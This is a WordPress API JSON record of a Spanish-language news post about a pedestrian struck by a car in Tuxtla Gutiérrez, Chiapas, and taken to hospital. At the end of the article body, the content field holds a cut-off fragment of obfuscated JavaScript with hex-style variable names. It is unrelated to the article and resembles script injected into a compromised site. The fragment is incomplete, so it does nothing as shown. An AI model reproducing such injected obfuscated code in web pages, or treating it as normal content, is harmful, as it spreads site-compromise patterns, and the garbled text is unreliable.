{"id":4278,"date":"2022-08-11T01:32:05","date_gmt":"2022-08-11T01:32:05","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4278"},"modified":"2022-08-11T01:32:06","modified_gmt":"2022-08-11T01:32:06","slug":"atropellan-a-hombre-en-la-novena-sur-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4278","title":{"rendered":"Atropellan a hombre en la Novena Sur de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660181287509-1024x576.jpg\" alt=\"\" class=\"wp-image-4279\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660181287509-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660181287509-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660181287509-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660181287509.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 10 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un hombre result\u00f3 herido luego de ser atropellado cuando caminaba sobre la Novena Sur y Bulevar La Salle, en la zona Oriente de Tuxtla.<\/p>\n\n\n\n<p>Este hecho ocurri\u00f3 cerca de las tres de la tarde de \u00e9ste mi\u00e9rcoles cuando el sujeto de unos 40 a\u00f1os de edad, pretend\u00eda cruzar la transitada v\u00eda y un autom\u00f3vil compacto lo embisti\u00f3 y sali\u00f3 volando para estrellarse contra el pavimento.<\/p>\n\n\n\n<p>Fueron los mismos automovilistas que lo auxiliaron y llamaron a los n\u00fameros de emergencias.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de la CRM para prestar la atenci\u00f3n prehospitalaria y posteriormente trasladar al herido al IMSS 5 de Mayo.<\/p>\n\n\n\n<p>Los peritos de tr\u00e1nsito tomaron los datos del hecho y se retiraron del lugar.<\/p>\n\n\n\n<p>Sobre el responsable nada se supo.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 10 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un hombre result\u00f3 herido luego de ser atropellado cuando caminaba sobre la Novena Sur y Bulevar La Salle, en la zona Oriente de Tuxtla. Este hecho ocurri\u00f3 cerca de las tres de la tarde de \u00e9ste mi\u00e9rcoles cuando el sujeto de unos 40 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4279,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-4278","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4278","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4278"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4278\/revisions"}],"predecessor-version":[{"id":4280,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4278\/revisions\/4280"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4279"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4278"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4278"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4278"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}